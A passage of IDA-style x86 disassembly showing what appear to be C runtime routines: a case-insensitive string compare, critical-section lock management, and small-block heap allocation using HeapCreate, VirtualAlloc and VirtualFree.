mov edi, [ebp+arg_4]
mov bh, 41h
mov bl, 5Ah
mov dh, 20h
lea ecx, [ecx+0]
loc_40583C: ; CODE XREF: sub_405820+49�j
mov ah, [esi]
or ah, ah
mov al, [edi]
jz short loc_40586B
or al, al
jz short loc_40586B
add esi, 1
add edi, 1
cmp ah, bh
jb short loc_405858
cmp ah, bl
ja short loc_405858
add ah, dh
loc_405858: ; CODE XREF: sub_405820+30�j
; sub_405820+34�j
cmp al, bh
jb short loc_405862
cmp al, bl
ja short loc_405862
add al, dh
loc_405862: ; CODE XREF: sub_405820+3A�j
; sub_405820+3E�j
cmp ah, al
jnz short loc_405871
sub ecx, 1
jnz short loc_40583C
loc_40586B: ; CODE XREF: sub_405820+22�j
; sub_405820+26�j
xor ecx, ecx
cmp ah, al
jz short loc_40587A
loc_405871: ; CODE XREF: sub_405820+44�j
mov ecx, 0FFFFFFFFh
jb short loc_40587A
neg ecx
loc_40587A: ; CODE XREF: sub_405820+B�j
; sub_405820+4F�j ...
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_405820 endp
; =============== S U B R O U T I N E =======================================
sub_405881 proc near ; CODE XREF: sub_4054D6+10C�p
push esi
push edi
xor esi, esi
mov edi, offset dword_425E18
loc_40588A: ; CODE XREF: sub_405881+35�j
cmp dword_423804[esi*8], 1
jnz short loc_4058B2
lea eax, ds:423800h[esi*8]
mov [eax], edi
push 0FA0h
push dword ptr [eax]
add edi, 18h
call sub_40CB14
test eax, eax
pop ecx
pop ecx
jz short loc_4058BE
loc_4058B2: ; CODE XREF: sub_405881+11�j
inc esi
cmp esi, 24h
jl short loc_40588A
xor eax, eax
inc eax
loc_4058BB: ; CODE XREF: sub_405881+47�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_4058BE: ; CODE XREF: sub_405881+2F�j
and off_423800[esi*8], 0
xor eax, eax
jmp short loc_4058BB
sub_405881 endp
; =============== S U B R O U T I N E =======================================
sub_4058CA proc near ; CODE XREF: sub_405229:loc_405261�j
push ebx
mov ebx, ds:dword_41D170
push esi
mov esi, offset off_423800
push edi
loc_4058D8: ; CODE XREF: sub_4058CA+30�j
mov edi, [esi]
test edi, edi
jz short loc_4058F1
cmp dword ptr [esi+4], 1
jz short loc_4058F1
push edi
call ebx ; RtlDeleteCriticalSection
push edi
call sub_403603
and dword ptr [esi], 0
pop ecx
loc_4058F1: ; CODE XREF: sub_4058CA+12�j
; sub_4058CA+18�j
add esi, 8
cmp esi, offset dword_423920
jl short loc_4058D8
mov esi, offset off_423800
pop edi
loc_405902: ; CODE XREF: sub_4058CA+50�j
mov eax, [esi]
test eax, eax
jz short loc_405911
cmp dword ptr [esi+4], 1
jnz short loc_405911
push eax
call ebx ; RtlDeleteCriticalSection
loc_405911: ; CODE XREF: sub_4058CA+3C�j
; sub_4058CA+42�j
add esi, 8
cmp esi, offset dword_423920
jl short loc_405902
pop esi
pop ebx
retn
sub_4058CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40591F proc near ; CODE XREF: sub_402ADF+2�p
; sub_403659+2�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push off_423800[eax*8]
call ds:dword_41D16C ; RtlLeaveCriticalSection
pop ebp
retn
sub_40591F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405934 proc near ; CODE XREF: sub_4059F7+14�p
; sub_4084A1+4F�p ...
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 0Ch
push offset dword_4214D8
call __SEH_prolog4
xor edi, edi
inc edi
mov [ebp+var_1C], edi
xor ebx, ebx
cmp dword_425F68, ebx
jnz short loc_405968
call sub_409C54
push 1Eh
call sub_409AB4
push 0FFh
call sub_4078A7
pop ecx
pop ecx
loc_405968: ; CODE XREF: sub_405934+1A�j
mov esi, [ebp+arg_0]
lea esi, ds:423800h[esi*8]
cmp [esi], ebx
jz short loc_40597A
mov eax, edi
jmp short loc_4059E8
; ---------------------------------------------------------------------------
loc_40597A: ; CODE XREF: sub_405934+40�j
push 18h
call sub_40773A
pop ecx
mov edi, eax
cmp edi, ebx
jnz short loc_405997
call sub_4057D3
mov dword ptr [eax], 0Ch
xor eax, eax
jmp short loc_4059E8
; ---------------------------------------------------------------------------
loc_405997: ; CODE XREF: sub_405934+52�j
push 0Ah
call sub_4059F7
pop ecx
mov [ebp+ms_exc.disabled], ebx
cmp [esi], ebx
jnz short loc_4059D2
push 0FA0h
push edi
call sub_40CB14
pop ecx
pop ecx
test eax, eax
jnz short loc_4059CE
push edi
call sub_403603
pop ecx
call sub_4057D3
mov dword ptr [eax], 0Ch
mov [ebp+var_1C], ebx
jmp short loc_4059D9
; ---------------------------------------------------------------------------
loc_4059CE: ; CODE XREF: sub_405934+81�j
mov [esi], edi
jmp short loc_4059D9
; ---------------------------------------------------------------------------
loc_4059D2: ; CODE XREF: sub_405934+70�j
push edi
call sub_403603
pop ecx
loc_4059D9: ; CODE XREF: sub_405934+98�j
; sub_405934+9C�j
mov [ebp+ms_exc.disabled], 0FFFFFFFEh
call sub_4059EE
mov eax, [ebp+var_1C]
loc_4059E8: ; CODE XREF: sub_405934+44�j
; sub_405934+61�j
call __SEH_epilog4
retn
sub_405934 endp
; =============== S U B R O U T I N E =======================================
sub_4059EE proc near ; CODE XREF: sub_405934+AC�p
; DATA XREF: .rdata:004214F0�o
push 0Ah
call sub_40591F
pop ecx
retn
sub_4059EE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4059F7 proc near ; CODE XREF: sub_402A45+44�p
; sub_403603+1E�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, [ebp+arg_0]
push esi
lea esi, ds:423800h[eax*8]
cmp dword ptr [esi], 0
jnz short loc_405A1D
push eax
call sub_405934
test eax, eax
pop ecx
jnz short loc_405A1D
push 11h
call sub_40785D
pop ecx
loc_405A1D: ; CODE XREF: sub_4059F7+11�j
; sub_4059F7+1C�j
push dword ptr [esi]
call ds:dword_41D168 ; RtlEnterCriticalSection
pop esi
pop ebp
retn
sub_4059F7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405A28 proc near ; CODE XREF: sub_405A83:loc_405AA6�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push esi
lea eax, [ebp+var_4]
xor esi, esi
push eax
mov [ebp+var_4], esi
mov [ebp+var_8], esi
call sub_407906
test eax, eax
pop ecx
jz short loc_405A51
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_405A51: ; CODE XREF: sub_405A28+1A�j
lea eax, [ebp+var_8]
push eax
call sub_40793D
test eax, eax
pop ecx
jz short loc_405A6C
push esi
push esi
push esi
push esi
push esi
call sub_402E3D
add esp, 14h
loc_405A6C: ; CODE XREF: sub_405A28+35�j
cmp [ebp+var_4], 2
pop esi
jnz short loc_405A7E
cmp [ebp+var_8], 5
jb short loc_405A7E
xor eax, eax
inc eax
leave
retn
; ---------------------------------------------------------------------------
loc_405A7E: ; CODE XREF: sub_405A28+49�j
; sub_405A28+4F�j
push 3
pop eax
leave
retn
sub_405A28 endp
; =============== S U B R O U T I N E =======================================
sub_405A83 proc near ; CODE XREF: .text:00404009�p
arg_0 = dword ptr 4
xor eax, eax
cmp [esp+arg_0], eax
push 0
setz al
push 1000h
push eax
call ds:dword_41D160 ; HeapCreate
test eax, eax
mov dword_425F68, eax
jnz short loc_405AA6
loc_405AA3: ; CODE XREF: sub_405A83+54�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_405AA6: ; CODE XREF: sub_405A83+1E�j
call sub_405A28
cmp eax, 3
mov dword_434DF4, eax
jnz short loc_405AD9
push 3F8h
call sub_405ADD
test eax, eax
pop ecx
jnz short loc_405AD9
push dword_425F68
call ds:dword_41D164 ; HeapDestroy
and dword_425F68, 0
jmp short loc_405AA3
; ---------------------------------------------------------------------------
loc_405AD9: ; CODE XREF: sub_405A83+30�j
; sub_405A83+3F�j
xor eax, eax
inc eax
retn
sub_405A83 endp
; =============== S U B R O U T I N E =======================================
sub_405ADD proc near ; CODE XREF: sub_405A83+37�p
arg_0 = dword ptr 4
push 140h
push 0
push dword_425F68
call ds:dword_41D114 ; RtlAllocateHeap
test eax, eax
mov dword_434DE0, eax
jnz short loc_405AFA
retn
; ---------------------------------------------------------------------------
loc_405AFA: ; CODE XREF: sub_405ADD+1A�j
mov ecx, [esp+arg_0]
and dword_425F6C, 0
and dword_434DDC, 0
mov dword_434DE8, eax
xor eax, eax
mov dword_434DE4, ecx
mov dword_434DEC, 10h
inc eax
retn
sub_405ADD endp
; =============== S U B R O U T I N E =======================================
sub_405B25 proc near ; CODE XREF: sub_402A45+4E�p
; sub_403603+29�p ...
arg_0 = dword ptr 4
mov ecx, dword_434DDC
mov eax, dword_434DE0
imul ecx, 14h
add ecx, eax
jmp short loc_405B49
; ---------------------------------------------------------------------------
loc_405B37: ; CODE XREF: sub_405B25+26�j
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_405B4F
add eax, 14h
loc_405B49: ; CODE XREF: sub_405B25+10�j
cmp eax, ecx
jb short loc_405B37
xor eax, eax
locret_405B4F: ; CODE XREF: sub_405B25+1F�j
retn
sub_405B25 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405B50 proc near ; CODE XREF: sub_403603+38�p
; sub_40DA6D+B5�p ...
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push esi
mov esi, [ebp+arg_4]
push edi
mov edi, esi
sub edi, [ecx+0Ch]
add esi, 0FFFFFFFCh
shr edi, 0Fh
mov ecx, edi
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_10], ecx
mov ecx, [esi]
dec ecx
test cl, 1
mov [ebp+var_4], ecx
jnz loc_405E60
push ebx
lea ebx, [ecx+esi]
mov edx, [ebx]
mov [ebp+var_C], edx
mov edx, [esi-4]
mov [ebp+var_8], edx
mov edx, [ebp+var_C]
test dl, 1
mov [ebp+arg_4], ebx
jnz short loc_405C1B
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_405BB3
push 3Fh
pop edx
loc_405BB3: ; CODE XREF: sub_405B50+5E�j
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_405BFD
cmp edx, 20h
mov ebx, 80000000h
jnb short loc_405BDE
mov ecx, edx
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_405BFA
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_405BFA
; ---------------------------------------------------------------------------
loc_405BDE: ; CODE XREF: sub_405B50+73�j
lea ecx, [edx-20h]
shr ebx, cl
lea ecx, [edx+eax+4]
not ebx
and [eax+edi*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_405BFA
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_405BFA: ; CODE XREF: sub_405B50+85�j
; sub_405B50+8C�j ...
mov ebx, [ebp+arg_4]
loc_405BFD: ; CODE XREF: sub_405B50+69�j
mov edx, [ebx+8]
mov ebx, [ebx+4]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_C]
mov [edx+4], ebx
mov edx, [ebp+arg_4]
mov ebx, [edx+4]
mov edx, [edx+8]
mov [ebx+8], edx
mov [ebp+var_4], ecx
loc_405C1B: ; CODE XREF: sub_405B50+55�j
mov edx, ecx
sar edx, 4
dec edx
cmp edx, 3Fh
jbe short loc_405C29
push 3Fh
pop edx
loc_405C29: ; CODE XREF: sub_405B50+D4�j
mov ebx, [ebp+var_8]
and ebx, 1
mov [ebp+var_C], ebx
jnz loc_405CC7
sub esi, [ebp+var_8]
mov ebx, [ebp+var_8]
sar ebx, 4
push 3Fh
mov [ebp+arg_4], esi
dec ebx
pop esi
cmp ebx, esi
jbe short loc_405C4E
mov ebx, esi
loc_405C4E: ; CODE XREF: sub_405B50+FA�j
add ecx, [ebp+var_8]
mov edx, ecx
sar edx, 4
dec edx
cmp edx, esi
mov [ebp+var_4], ecx
jbe short loc_405C60
mov edx, esi
loc_405C60: ; CODE XREF: sub_405B50+10C�j
cmp ebx, edx
jz short loc_405CC2
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
cmp esi, [ecx+8]
jnz short loc_405CAA
cmp ebx, 20h
mov esi, 80000000h
jnb short loc_405C90
mov ecx, ebx
shr esi, cl
not esi
and [eax+edi*4+44h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_405CAA
mov ecx, [ebp+arg_0]
and [ecx], esi
jmp short loc_405CAA
; ---------------------------------------------------------------------------
loc_405C90: ; CODE XREF: sub_405B50+127�j
lea ecx, [ebx-20h]
shr esi, cl
not esi
and [eax+edi*4+0C4h], esi
dec byte ptr [ebx+eax+4]
jnz short loc_405CAA
mov ecx, [ebp+arg_0]
and [ecx+4], esi
loc_405CAA: ; CODE XREF: sub_405B50+11D�j
; sub_405B50+137�j ...
mov ecx, [ebp+arg_4]
mov esi, [ecx+8]
mov ecx, [ecx+4]
mov [esi+4], ecx
mov ecx, [ebp+arg_4]
mov esi, [ecx+4]
mov ecx, [ecx+8]
mov [esi+8], ecx
loc_405CC2: ; CODE XREF: sub_405B50+112�j
mov esi, [ebp+arg_4]
jmp short loc_405CCA
; ---------------------------------------------------------------------------
loc_405CC7: ; CODE XREF: sub_405B50+E2�j
mov ebx, [ebp+arg_0]
loc_405CCA: ; CODE XREF: sub_405B50+175�j
cmp [ebp+var_C], 0
jnz short loc_405CD8
cmp ebx, edx
jz loc_405D58
loc_405CD8: ; CODE XREF: sub_405B50+17E�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edx*8]
mov ebx, [ecx+4]
mov [esi+8], ecx
mov [esi+4], ebx
mov [ecx+4], esi
mov ecx, [esi+4]
mov [ecx+8], esi
mov ecx, [esi+4]
cmp ecx, [esi+8]
jnz short loc_405D58
mov cl, [edx+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp edx, 20h
mov [edx+eax+4], cl
jnb short loc_405D2F
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_405D1E
mov ecx, edx
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_405D1E: ; CODE XREF: sub_405B50+1BE�j
mov ebx, 80000000h
mov ecx, edx
shr ebx, cl
lea eax, [eax+edi*4+44h]
or [eax], ebx
jmp short loc_405D58
; ---------------------------------------------------------------------------
loc_405D2F: ; CODE XREF: sub_405B50+1B8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_405D45
lea ecx, [edx-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_405D45: ; CODE XREF: sub_405B50+1E3�j
lea ecx, [edx-20h]
mov edx, 80000000h
shr edx, cl
lea eax, [eax+edi*4+0C4h]
or [eax], edx
loc_405D58: ; CODE XREF: sub_405B50+182�j
; sub_405B50+1A6�j ...
mov eax, [ebp+var_4]
mov [esi], eax
mov [eax+esi-4], eax
mov eax, [ebp+var_10]
dec dword ptr [eax]
jnz loc_405E5F
mov eax, dword_425F6C
test eax, eax
jz loc_405E51
mov ecx, dword_434DF0
mov esi, ds:dword_41D15C
push 4000h
shl ecx, 0Fh
add ecx, [eax+0Ch]
mov ebx, 8000h
push ebx
push ecx
call esi ; VirtualFree
mov ecx, dword_434DF0
mov eax, dword_425F6C
mov edx, 80000000h
shr edx, cl
or [eax+8], edx
mov eax, dword_425F6C
mov eax, [eax+10h]
mov ecx, dword_434DF0
and dword ptr [eax+ecx*4+0C4h], 0
mov eax, dword_425F6C
mov eax, [eax+10h]
dec byte ptr [eax+43h]
mov eax, dword_425F6C
mov ecx, [eax+10h]
cmp byte ptr [ecx+43h], 0
jnz short loc_405DE6
and dword ptr [eax+4], 0FFFFFFFEh
mov eax, dword_425F6C
loc_405DE6: ; CODE XREF: sub_405B50+28B�j
cmp dword ptr [eax+8], 0FFFFFFFFh
jnz short loc_405E51
push ebx
push 0
push dword ptr [eax+0Ch]
call esi ; VirtualFree
mov eax, dword_425F6C
push dword ptr [eax+10h]
push 0
push dword_425F68
call ds:dword_41D10C ; RtlFreeHeap
mov ecx, dword_434DDC
mov eax, dword_425F6C
imul ecx, 14h
mov edx, dword_434DE0
sub ecx, eax
lea ecx, [ecx+edx-14h]
push ecx
lea ecx, [eax+14h]
push ecx
push eax
call sub_407370
mov eax, [ebp+arg_0]
add esp, 0Ch
dec dword_434DDC
cmp eax, dword_425F6C
jbe short loc_405E47
sub [ebp+arg_0], 14h
loc_405E47: ; CODE XREF: sub_405B50+2F1�j
mov eax, dword_434DE0
mov dword_434DE8, eax
loc_405E51: ; CODE XREF: sub_405B50+223�j
; sub_405B50+29A�j
mov eax, [ebp+arg_0]
mov dword_425F6C, eax
mov dword_434DF0, edi
loc_405E5F: ; CODE XREF: sub_405B50+216�j
pop ebx
loc_405E60: ; CODE XREF: sub_405B50+37�j
pop edi
pop esi
leave
retn
sub_405B50 endp
; =============== S U B R O U T I N E =======================================
sub_405E64 proc near ; CODE XREF: sub_4062F9+C0�p
mov eax, dword_434DEC
push esi
mov esi, dword_434DDC
push edi
xor edi, edi
cmp esi, eax
jnz short loc_405EAB
add eax, 10h
imul eax, 14h
push eax
push dword_434DE0
push edi
push dword_425F68
call ds:dword_41D154 ; RtlReAllocateHeap
cmp eax, edi
jnz short loc_405E99
loc_405E95: ; CODE XREF: sub_405E64+68�j
; sub_405E64+94�j
xor eax, eax
jmp short loc_405F11
; ---------------------------------------------------------------------------
loc_405E99: ; CODE XREF: sub_405E64+2F�j
add dword_434DEC, 10h
mov esi, dword_434DDC
mov dword_434DE0, eax
loc_405EAB: ; CODE XREF: sub_405E64+11�j
imul esi, 14h
add esi, dword_434DE0
push 41C4h
push 8
push dword_425F68
call ds:dword_41D114 ; RtlAllocateHeap
cmp eax, edi
mov [esi+10h], eax
jz short loc_405E95
push 4
push 2000h
push 100000h
push edi
call ds:dword_41D158 ; VirtualAlloc
cmp eax, edi
mov [esi+0Ch], eax
jnz short loc_405EFA
push dword ptr [esi+10h]
push edi
push dword_425F68
call ds:dword_41D10C ; RtlFreeHeap
jmp short loc_405E95
; ---------------------------------------------------------------------------
loc_405EFA: ; CODE XREF: sub_405E64+82�j
or dword ptr [esi+8], 0FFFFFFFFh
mov [esi], edi
mov [esi+4], edi
inc dword_434DDC
mov eax, [esi+10h]
or dword ptr [eax], 0FFFFFFFFh
mov eax, esi
loc_405F11: ; CODE XREF: sub_405E64+33�j
pop edi
pop esi
retn
sub_405E64 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405F14 proc near ; CODE XREF: sub_4062F9+D6�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
mov ecx, [ebp+arg_0]
mov eax, [ecx+8]
push ebx
push esi
mov esi, [ecx+10h]
push edi
xor ebx, ebx
jmp short loc_405F2C
; ---------------------------------------------------------------------------
loc_405F29: ; CODE XREF: sub_405F14+1A�j
add eax, eax
inc ebx
loc_405F2C: ; CODE XREF: sub_405F14+13�j
test eax, eax
jge short loc_405F29
mov eax, ebx
imul eax, 204h
lea eax, [eax+esi+144h]
push 3Fh
mov [ebp+var_8], eax
pop edx
loc_405F45: ; CODE XREF: sub_405F14+3B�j
mov [eax+8], eax
mov [eax+4], eax
add eax, 8
dec edx
jnz short loc_405F45
push 4
mov edi, ebx
push 1000h
shl edi, 0Fh
add edi, [ecx+0Ch]
push 8000h
push edi
call ds:dword_41D158 ; VirtualAlloc
test eax, eax
jnz short loc_405F78
or eax, 0FFFFFFFFh
jmp loc_406015
; ---------------------------------------------------------------------------
loc_405F78: ; CODE XREF: sub_405F14+5A�j
lea edx, [edi+7000h]
cmp edi, edx
mov [ebp+var_4], edx
ja short loc_405FC8
mov ecx, edx
sub ecx, edi
shr ecx, 0Ch
lea eax, [edi+10h]
inc ecx
loc_405F90: ; CODE XREF: sub_405F14+AF�j
or dword ptr [eax-8], 0FFFFFFFFh
or dword ptr [eax+0FECh], 0FFFFFFFFh
lea edx, [eax+0FFCh]
mov [eax], edx
lea edx, [eax-1004h]
mov dword ptr [eax-4], 0FF0h
mov [eax+4], edx
mov dword ptr [eax+0FE8h], 0FF0h
add eax, 1000h
dec ecx
jnz short loc_405F90
mov edx, [ebp+var_4]
loc_405FC8: ; CODE XREF: sub_405F14+6F�j
mov eax, [ebp+var_8]
add eax, 1F8h
lea ecx, [edi+0Ch]
mov [eax+4], ecx
mov [ecx+8], eax
lea ecx, [edx+0Ch]
mov [eax+8], ecx
mov [ecx+4], eax
and dword ptr [esi+ebx*4+44h], 0
xor edi, edi
inc edi
mov [esi+ebx*4+0C4h], edi
mov al, [esi+43h]
mov cl, al
inc cl
test al, al
mov eax, [ebp+arg_0]
mov [esi+43h], cl
jnz short loc_406005
or [eax+4], edi
loc_406005: ; CODE XREF: sub_405F14+EC�j
mov edx, 80000000h
mov ecx, ebx
shr edx, cl
not edx
and [eax+8], edx
mov eax, ebx
loc_406015: ; CODE XREF: sub_405F14+5F�j
pop edi
pop esi
pop ebx
leave
retn
sub_405F14 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40601A proc near ; CODE XREF: sub_40DA6D+77�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
mov ecx, [ebp+arg_0]
mov eax, [ecx+10h]
push ebx
push esi
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov edx, edi
sub edx, [ecx+0Ch]
add esi, 17h
shr edx, 0Fh
mov ecx, edx
imul ecx, 204h
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ecx
mov ecx, [edi-4]
and esi, 0FFFFFFF0h
dec ecx
cmp esi, ecx
lea edi, [ecx+edi-4]
mov ebx, [edi]
mov [ebp+arg_8], ecx
mov [ebp+var_4], ebx
jle loc_4061BC
test bl, 1
jnz loc_4061B5
add ebx, ecx
cmp esi, ebx
jg loc_4061B5
mov ecx, [ebp+var_4]
sar ecx, 4
dec ecx
cmp ecx, 3Fh
mov [ebp+var_8], ecx
jbe short loc_40608F
push 3Fh
pop ecx
mov [ebp+var_8], ecx
loc_40608F: ; CODE XREF: sub_40601A+6D�j
mov ebx, [edi+4]
cmp ebx, [edi+8]
jnz short loc_4060DA
cmp ecx, 20h
mov ebx, 80000000h
jnb short loc_4060BB
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [ecx]
jnz short loc_4060DA
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_4060DA
; ---------------------------------------------------------------------------
loc_4060BB: ; CODE XREF: sub_40601A+85�j
add ecx, 0FFFFFFE0h
shr ebx, cl
mov ecx, [ebp+var_8]
lea ecx, [ecx+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_4060DA
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_4060DA: ; CODE XREF: sub_40601A+7B�j
; sub_40601A+98�j ...
mov ecx, [edi+8]
mov ebx, [edi+4]
mov [ecx+4], ebx
mov ecx, [edi+4]
mov edi, [edi+8]
mov [ecx+8], edi
mov ecx, [ebp+arg_8]
sub ecx, esi
add [ebp+var_4], ecx
cmp [ebp+var_4], 0
jle loc_4061A3
mov edi, [ebp+var_4]
mov ecx, [ebp+arg_4]
sar edi, 4
dec edi
cmp edi, 3Fh
lea ecx, [ecx+esi-4]
jbe short loc_406114
push 3Fh
pop edi
loc_406114: ; CODE XREF: sub_40601A+F5�j
mov ebx, [ebp+var_C]
lea ebx, [ebx+edi*8]
mov [ebp+arg_8], ebx
mov ebx, [ebx+4]
mov [ecx+4], ebx
mov ebx, [ebp+arg_8]
mov [ecx+8], ebx
mov [ebx+4], ecx
mov ebx, [ecx+4]
mov [ebx+8], ecx
mov ebx, [ecx+4]
cmp ebx, [ecx+8]
jnz short loc_406191
mov cl, [edi+eax+4]
mov byte ptr [ebp+arg_8+3], cl
inc cl
cmp edi, 20h
mov [edi+eax+4], cl
jnb short loc_406168
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_406160
mov ecx, edi
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_406160: ; CODE XREF: sub_40601A+136�j
lea eax, [eax+edx*4+44h]
mov ecx, edi
jmp short loc_406188
; ---------------------------------------------------------------------------
loc_406168: ; CODE XREF: sub_40601A+130�j
cmp byte ptr [ebp+arg_8+3], 0
jnz short loc_40617E
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_40617E: ; CODE XREF: sub_40601A+152�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [edi-20h]
loc_406188: ; CODE XREF: sub_40601A+14C�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_406191: ; CODE XREF: sub_40601A+11E�j
mov edx, [ebp+arg_4]
mov ecx, [ebp+var_4]
lea eax, [edx+esi-4]
mov [eax], ecx
mov [ecx+eax-4], ecx
jmp short loc_4061A6
; ---------------------------------------------------------------------------
loc_4061A3: ; CODE XREF: sub_40601A+DE�j
mov edx, [ebp+arg_4]
loc_4061A6: ; CODE XREF: sub_40601A+187�j
lea eax, [esi+1]
mov [edx-4], eax
mov [edx+esi-8], eax
jmp loc_4062F1
; ---------------------------------------------------------------------------
loc_4061B5: ; CODE XREF: sub_40601A+50�j
; sub_40601A+5A�j
xor eax, eax
jmp loc_4062F4
; ---------------------------------------------------------------------------
loc_4061BC: ; CODE XREF: sub_40601A+47�j
jge loc_4062F1
mov ebx, [ebp+arg_4]
sub [ebp+arg_8], esi
lea ecx, [esi+1]
mov [ebx-4], ecx
lea ebx, [ebx+esi-4]
mov esi, [ebp+arg_8]
sar esi, 4
dec esi
cmp esi, 3Fh
mov [ebp+arg_4], ebx
mov [ebx-4], ecx
jbe short loc_4061E7
push 3Fh
pop esi
loc_4061E7: ; CODE XREF: sub_40601A+1C8�j
test byte ptr [ebp+var_4], 1
jnz loc_406271
mov esi, [ebp+var_4]
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_406200
push 3Fh
pop esi
loc_406200: ; CODE XREF: sub_40601A+1E1�j
mov ecx, [edi+4]
cmp ecx, [edi+8]
jnz short loc_40624A
cmp esi, 20h
mov ebx, 80000000h
jnb short loc_40622B
mov ecx, esi
shr ebx, cl
lea esi, [esi+eax+4]
not ebx
and [eax+edx*4+44h], ebx
dec byte ptr [esi]
jnz short loc_406247
mov ecx, [ebp+arg_0]
and [ecx], ebx
jmp short loc_406247
; ---------------------------------------------------------------------------
loc_40622B: ; CODE XREF: sub_40601A+1F6�j
lea ecx, [esi-20h]
shr ebx, cl
lea ecx, [esi+eax+4]
not ebx
and [eax+edx*4+0C4h], ebx
dec byte ptr [ecx]
jnz short loc_406247
mov ecx, [ebp+arg_0]
and [ecx+4], ebx
loc_406247: ; CODE XREF: sub_40601A+208�j
; sub_40601A+20F�j ...
mov ebx, [ebp+arg_4]
loc_40624A: ; CODE XREF: sub_40601A+1EC�j
mov ecx, [edi+8]
mov esi, [edi+4]
mov [ecx+4], esi
mov esi, [edi+8]
mov ecx, [edi+4]
mov [ecx+8], esi
mov esi, [ebp+arg_8]
add esi, [ebp+var_4]
mov [ebp+arg_8], esi
sar esi, 4
dec esi
cmp esi, 3Fh
jbe short loc_406271
push 3Fh
pop esi
loc_406271: ; CODE XREF: sub_40601A+1D1�j
; sub_40601A+252�j
mov ecx, [ebp+var_C]
lea ecx, [ecx+esi*8]
mov edi, [ecx+4]
mov [ebx+8], ecx
mov [ebx+4], edi
mov [ecx+4], ebx
mov ecx, [ebx+4]
mov [ecx+8], ebx
mov ecx, [ebx+4]
cmp ecx, [ebx+8]
jnz short loc_4062E8
mov cl, [esi+eax+4]
mov byte ptr [ebp+arg_4+3], cl
inc cl
cmp esi, 20h
mov [esi+eax+4], cl
jnb short loc_4062BF
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4062B7
mov ecx, esi
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx], edi
loc_4062B7: ; CODE XREF: sub_40601A+28D�j
lea eax, [eax+edx*4+44h]
mov ecx, esi
jmp short loc_4062DF
; ---------------------------------------------------------------------------
loc_4062BF: ; CODE XREF: sub_40601A+287�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4062D5
lea ecx, [esi-20h]
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_0]
or [ecx+4], edi
loc_4062D5: ; CODE XREF: sub_40601A+2A9�j
lea eax, [eax+edx*4+0C4h]
lea ecx, [esi-20h]
loc_4062DF: ; CODE XREF: sub_40601A+2A3�j
mov edx, 80000000h
shr edx, cl
or [eax], edx
loc_4062E8: ; CODE XREF: sub_40601A+275�j
mov eax, [ebp+arg_8]
mov [ebx], eax
mov [eax+ebx-4], eax
loc_4062F1: ; CODE XREF: sub_40601A+196�j
; sub_40601A:loc_4061BC�j
xor eax, eax
